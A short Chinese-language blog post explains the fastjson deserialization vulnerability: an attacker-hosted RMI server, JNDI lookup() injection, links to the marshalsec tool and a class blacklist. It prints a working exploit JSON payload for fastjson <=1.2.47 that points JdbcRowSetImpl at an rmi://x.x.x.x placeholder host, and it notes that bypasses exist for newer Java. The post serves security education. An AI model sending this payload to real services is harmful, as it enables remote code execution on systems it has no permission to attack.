fastjson反序列化漏洞原理简述

作为反序列化三大巨头之一,fastjson出现的频率也是很高的,今天就给大家简单描述一下。

  • fastjson简介
    Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。简单来说就是可以进行类和json格式的字符串互相转换。
  • 漏洞原理
    攻击者在本地启一个rmi的服务器,上面挂上恶意的payload
    让被攻击的目标反序列化特定的类,这个类最终会调用lookup()函数,导致jndi接口指向我们的rmi服务器上的恶意payload

jndi是一个Java命令和目录接口,举个例子,通过jndi进行数据库操作,无需知道它数据库是mysql还是ssql,还是MongoDB等,它会自动识别。当然rmi也可以通过jndi实现,rmi的作用相当于在服务器上创建了类的仓库的api,客户端只用带着参数去请求,服务器进行一系列处理后,把运算后的参数还回来

rmi服务器:https://github.com/mbechler/marshalsec

要注意的是jre版本需要和目标服务器版本相同。
官方给出的修复补丁一直都是升级黑名单

github上有人跑出的版本黑名单:https://github.com/LeadroyaL/fastjson-blacklist
目前更新到1.2.71

对于fastjson<=1.2.47有个通用exp:

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "rmi://x.x.x.x:1098/jndi", 
        "autoCommit": true
    }
}

高版本的java对jndi注入进行了限制,由于环境的不同,存在一些方法进行绕过,这里推荐下国外Michael Stepankin大牛的方法。https://www.veracode.com/blog/research/exploiting-jndi-injections-java

本文参考:https://www.jianshu.com/p/35b84eda9292?utm_campaign=haruki
https://www.cnblogs.com/sijidou/p/13121332.html

你可能感兴趣的:(web,java,渗透测试,java,数据库,web安全)